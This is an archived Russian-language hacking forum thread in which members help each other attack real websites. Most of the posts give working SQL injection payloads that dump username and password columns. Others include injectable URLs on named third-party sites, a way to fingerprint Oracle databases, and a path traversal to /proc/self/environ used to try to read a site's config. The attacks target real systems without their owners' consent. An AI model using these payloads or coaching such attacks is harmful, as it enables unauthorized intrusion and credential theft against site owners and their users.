Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Данные не могу вывести, ХЗ в чём дело:

    Code:
    -1+UNION+SELECT+1,2,3,group_concat(username,0x3a,password),5,6,7,8+FROM+calendar_users+LIMIT+1,1+--
    После этого проведения нет никаких ошибок, обычная страница с текстом.
    Что ещё можно сделать?


    ЗЫ:
    Code:
    -1 UNION SELECT 1,2,3, COLUMN_NAME,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0xblablabla LIMIT 0,100 --
    
     
    #17741 Komyak, 27 Aug 2011
    Last edited: 27 Aug 2011
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    и
    Жесть)
    попробуй concat_ws(username,0x3a,password)
     
  3. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Без изменений.
     
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    and 1=0 ...count(*)...concat... limit 0,1
     
    1 person likes this.
  5. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    and 1=0 ... limit 0,1
    Не меняется ничего и не выдаёт...
     
  6. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    Возможно вывод выпал в сорцы или в колонках пусто, либо данные начинаются не с первого поля. Попробуй ещё вывести без конкатенации.
     
  7. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    На Limit не распространяется значение первого поля.
    Komyak, в предыдущем сообщение я же вам написал показать count(*).
     
  8. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    +and+1=0+union+select+1,CONCAT(CONCAT(count(*),username,CONCAT(count(*),password))),3,4,5,6,7,8+from+calendar_users limit+0,1--
    
    Вывод делает:
    и все, больше ничего не получается извлечь.
     
    #17748 Komyak, 27 Aug 2011
    Last edited: 27 Aug 2011
  9. Samael91

    Samael91 New Member

    Joined:
    2 Dec 2010
    Messages:
    38
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    Подскажите как раскручивать такую SQL inj
    http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13--
    Но когда ввожу
    http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
    Ошибка! 0_о
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Там стоит Oracle

    http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,null+from+sys.dual
     
  11. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    up, вопрос еще актуален.Уязвимый сайт: http://socketmobile.com/support/wifi/pw.asp
     
  12. Samael91

    Samael91 New Member

    Joined:
    2 Dec 2010
    Messages:
    38
    Likes Received:
    0
    Reputations:
    0
    Скажи плиз как ты узнал что там Oracle?
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null+from+sys.dual

    http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,null+from+sys.dual

    Отличия видишь?
     
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    Здесь люди не экстрасенсы...попробуй

    1+and+1=0+UNION+SELECT+1,2,3,unhex(hex(username)),5,6,7,8+FROM+calendar_users+LIMIT+0,1+--
     
    _________________________
    #17754 HAXTA4OK, 28 Aug 2011
    Last edited: 28 Aug 2011
    2 people like this.
  15. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, как вывести названия таблиц, если через information_schema.tables не выводит, но известна БД (к примеру catalog) ?

    http://*/index.php?id=-5+union+select+1,2,,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19+--+

    Версия-4.0.27-Max-log
     
  16. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../proc/self/environ%00

    Почему не инклудит логи? И как можно прочитать конфиг?
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Никак. В mysql4 нет information_schema, а БД можно узнать встроенной функцией:)D) :)
     
  18. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Получается нельзя добраться до логин:пароль никак??? (через инъекцию)
     
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    методом тыка...то есть колонки и таблицу подбираешь сам
     
    _________________________
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    permission denied же
     
    1 person likes this.
Thread Status:
Not open for further replies.